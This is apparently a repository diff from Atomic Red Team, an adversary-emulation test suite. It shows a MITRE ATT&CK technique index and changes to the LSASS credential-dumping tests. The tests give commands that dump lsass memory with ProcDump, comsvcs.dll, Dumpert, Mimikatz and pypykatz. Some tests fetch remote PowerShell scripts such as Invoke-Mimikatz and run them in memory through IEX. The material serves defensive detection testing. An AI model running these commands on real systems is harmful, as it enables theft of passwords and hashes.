| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Windows Service](../../T1543.003/T1543.003.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | [SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | | | | | | | |
| | | | | [Signed Binary Proxy Execution](../../T1218/T1218.md) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
atomics/Indexes/index.yaml
+34981 -60318
View File
File diff suppressed because it is too large Load Diff
atomics/T1003.001/T1003.001.md
+85 -357
View File
@@ -13,10 +13,6 @@ Locally, mimikatz can be run using:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
Built-in Windows tools such as comsvcs.dll can also be used:
* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
@@ -30,13 +26,13 @@ The following SSPs can be used to access credentials:
## Atomic Tests
- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
- [Atomic Test #1 - Windows Credential Editor](#atomic-test-1---windows-credential-editor)
- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #2 - Dump LSASS.exe Memory using ProcDump](#atomic-test-2---dump-lsassexe-memory-using-procdump)
- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-3---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
- [Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-4---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
@@ -44,20 +40,70 @@ The following SSPs can be used to access credentials:
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
<br/>
## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
## Atomic Test #1 - Windows Credential Editor
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)
Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
If you see no output it is likely that execution was blocked by Anti-Virus.
If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;wce.exe|
| wce_url | Path to download Windows Credential Editor zip file | url | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{wce_exe} -o #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2>&1
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
```
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
@@ -68,14 +114,10 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
@@ -99,11 +141,10 @@ del "#{output_file}" >nul 2> nul
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -116,7 +157,7 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
@@ -124,10 +165,6 @@ Upon successful execution, you should see the following file created $env:TEMP\l
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
@@ -150,7 +187,7 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
<br/>
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
@@ -161,14 +198,10 @@ If you see a message saying \"The system cannot find the path specified.\", try
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|
@@ -191,11 +224,10 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
@@ -203,55 +235,6 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
<br/>
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
**Supported Platforms:** Windows
**auto_generated_guid:** dddd4aca-bbed-46f0-984d-e4c5971c51ea
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
```
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe)
##### Check Prereq Commands:
```powershell
if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe"
```
<br/>
<br/>
@@ -262,10 +245,6 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
@@ -296,17 +275,13 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | String | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;mimikatz.exe|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -323,13 +298,12 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -337,7 +311,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```powershell
@@ -360,10 +334,6 @@ Successful execution of this test will display multiple useranames and passwords
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
@@ -377,275 +347,33 @@ pypykatz live lsa
#### Dependencies: Run with `command_prompt`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```cmd
```powershell
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```powershell
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```cmd
```powershell
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
if (cmd /c pypykatz -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #10 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;dotnet-lsass.dmp|
